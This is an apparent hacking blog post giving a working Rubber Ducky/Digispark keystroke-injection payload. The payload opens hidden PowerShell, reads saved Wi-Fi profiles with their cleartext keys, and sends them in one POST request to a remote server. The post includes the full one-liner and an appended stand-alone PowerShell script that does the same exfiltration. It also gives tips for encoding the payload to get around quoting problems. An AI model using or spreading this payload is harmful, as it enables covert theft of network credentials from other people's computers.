May 20, 2019

Rubber Ducky: Wifi Password Exfil via POST V2

The first version of my Rubber Ducky script to exfil wifi passwords via POST dumped each wifi profile as an XML file, then sent the desired fields as a POST request. This works pretty well, but with a separate POST request for each wifi profile I found myself skipping past unnecessary data server-side, so I thought 'why not send everything in one nicely formatted POST request?'

TL;DR: Grab the new script here. Beginner-friendly breakdown of my process below:

In order to achieve this, the idea was to reuse the part of the V1 script that dumped each wifi profile to an XML file, parse each XML file, write the desired fields to a new file, then send the contents of that new file in one POST request. This was easier said than done, as you will see.

I started off with the XML files in c:\l, as that was the first part of the script, then started building the PowerShell command: Get-ChildItem -name -Include *.xml > list.txt; Get-Content list.txt | ForEach-Object { [xml]$xmlDoc = Get-Content $_;  - this part is reused from V1. It writes the name of each XML file to list.txt, then starts a ForEach-Object loop that reads each listed file and casts its contents to an [xml] object in the $xmlDoc variable, so the profile fields can be reached as properties. We start building the rest of the loop below:

write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt - This uses the write-output command to append "SSID: " followed by the SSID field I covered in the V1 tutorial to wifi.txt. As in a Linux shell, wrapping an expression in $(<expression>) substitutes its value; inside a PowerShell double-quoted string this is required, because "$xmlDoc.WLANProfile..." would expand only $xmlDoc and leave the rest of the property path as literal text.

Using the same syntax for the other fields, the final command is as follows:

write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt;write-output "Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)">>wifi.txt;write-output "Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)">>wifi.txt;write-output "Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)">>wifi.txt;write-output "-------">>wifi.txt

Now everything is nicely formatted with a line of hyphens to separate each wifi network:

Then I tried to use invoke-webrequest to send the contents of wifi.txt but got an unpleasant surprise:

The HTTP server was not happy with me either:

After a lot of googling and experimentation, I figured out the solution to the problem. Neither PowerShell nor the HTTP server liked the encoding of the text file, so I ended up using the out-file command with an 'encoding' flag to rewrite wifi.txt with ASCII encoding to 'wifi-enc.txt', using the command get-content wifi.txt |out-file -encoding ascii wifi-enc.txt. After this, sending 'wifi-enc.txt' in a POST request worked without a problem:

Server side:

Sweet! I thought I was in the home stretch here and just needed to finish the loop. I did so and everything looked great until I flashed the script to the Digispark and found that my formatting had been lost:

Can you spot the problem below?

cmd /c start powershell -nop -win hid -c "Get-ChildItem -name -Include *.xml >list.txt;Get-Content list.txt|ForEach-Object { [xml]$xmlDoc = Get-Content $_;write-output "SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)" >>wifi.txt;write-output "Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)">>wifi.txt;write-output "Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)">>wifi.txt;write-output "Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)">>wifi.txt;write-output "-------">>wifi.txt};get-content wifi.txt |out-file -encoding ascii wifi-enc.txt;invoke-webrequest http://your-server -method post -infile wifi-enc.txt

It's the quotation marks. The cmd shell is used to run powershell with the command in double-quotes ( cmd /c powershell -c "<command>"), but I also used double-quotes to specify what I wanted written to wifi.txt, so the inner quotes close the outer quoted command early and the labels end up as bare words. Okay, should be easy enough to escape the quotes, right? A quick Google search said to use a backtick ` to escape the quotes. That didn't work and the formatting was still gone, as above: the inner quotes are stripped by the Windows command-line parser before PowerShell ever runs the command, so PowerShell's own escape character can't protect them. After looking around for quite a while, I finally found this post that suggested using 4 double-quotes instead. That solved the problem, so the final command was:

cmd /c start powershell -nop -win hid -c "Get-ChildItem -name -Include *.xml >list.txt;Get-Content list.txt|ForEach-Object { [xml]$xmlDoc = Get-Content $_;write-output """"SSID: $($xmlDoc.WLANProfile.SSIDConfig.SSID.Name)"""" >>wifi.txt;write-output """"Password: $($xmlDoc.WLANProfile.MSM.security.sharedkey.keyMaterial)"""">>wifi.txt;write-output """"Authentication: $($xmlDoc.WLANProfile.MSM.security.authencryption.authentication)"""">>wifi.txt;write-output """"Encryption: $($xmlDoc.WLANProfile.MSM.security.authencryption.encryption)"""">>wifi.txt;write-output """"-------"""">>wifi.txt};get-content wifi.txt |out-file -encoding ascii wifi-enc.txt;invoke-webrequest http://your-server -method post -infile wifi-enc.txt
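The same procedure as a stand-alone PowerShell script, added here as an example and not the author's payload. It builds the whole report in memory instead of going through wifi.txt and wifi-enc.txt, which sidesteps the encoding problem above (Windows PowerShell's > and >> redirections write UTF-16LE with an FF FE byte-order mark, which is what the listener choked on; Format-Hex wifi.txt will show it), and it sends the exact ASCII bytes it built. Assumptions not stated on the page: the profile XML files were produced with netsh wlan export profile key=clear folder=C:\l (the only export that includes keyMaterial), the listener URL is the http://your-server placeholder from the post, and the script runs on Windows PowerShell 5.1 or later.

```powershell
# Added example (not the author's code). Collect WLAN profile fields from the XML files
# exported by "netsh wlan export profile key=clear folder=C:\l" (assumed; see lead-in)
# and POST them as a single ASCII body.
param(
    [string]$ProfileDir = 'C:\l',               # assumed export folder, as in the post
    [string]$Url        = 'http://your-server/'  # placeholder listener URL from the post
)

function Get-WlanProfileSummary {
    param([Parameter(Mandatory)][string]$Path)
    # Read the whole file as one string and parse it as XML. The real element names are
    # sharedKey / keyMaterial / authEncryption; PowerShell property access on [xml] is
    # case-insensitive, which is why the lower-case spelling in the one-liner also works.
    [xml]$doc = Get-Content -Path $Path -Raw
    $sec = $doc.WLANProfile.MSM.security
    [pscustomobject]@{
        SSID           = $doc.WLANProfile.SSIDConfig.SSID.name
        Password       = $sec.sharedKey.keyMaterial   # $null for open networks or non key=clear exports
        Authentication = $sec.authEncryption.authentication
        Encryption     = $sec.authEncryption.encryption
    }
}

function Format-WlanReport {
    param([object[]]$Profiles)
    # Same layout as the post: one block per network, separated by a line of hyphens.
    $sb = New-Object System.Text.StringBuilder
    foreach ($p in $Profiles) {
        [void]$sb.AppendLine("SSID: $($p.SSID)")
        [void]$sb.AppendLine("Password: $($p.Password)")
        [void]$sb.AppendLine("Authentication: $($p.Authentication)")
        [void]$sb.AppendLine("Encryption: $($p.Encryption)")
        [void]$sb.AppendLine('-------')
    }
    $sb.ToString()
}

# -Filter is applied by the file-system provider and needs no -Recurse or wildcard path.
$profiles = Get-ChildItem -Path $ProfileDir -Filter *.xml |
    ForEach-Object { Get-WlanProfileSummary -Path $_.FullName }
$report = Format-WlanReport -Profiles $profiles

# Encode explicitly instead of trusting a redirection operator's default encoding, and
# tell the server what it is getting. -Body accepts a byte[] and sends it untouched.
$bytes = [System.Text.Encoding]::ASCII.GetBytes($report)
Invoke-WebRequest -Uri $Url -Method Post -ContentType 'text/plain; charset=us-ascii' `
    -Body $bytes -UseBasicParsing | Out-Null
```

Because the quoting is now inside a script rather than inside a cmd /c powershell -c "..." string, the four-double-quotes trick is no longer needed. If the payload still has to be typed by the keystroke injector, the quoting fight can be avoided entirely by passing the script with powershell -EncodedCommand, which takes the Base64 of the script's UTF-16LE bytes ([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptText))). Two practical caveats: keyMaterial is only present when the export was run with key=clear, and the post's listener is plain HTTP, so the collected keys cross the network in the clear; in a real engagement terminate this on an HTTPS listener you control.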

The full Rubber Ducky payload can be downloaded here.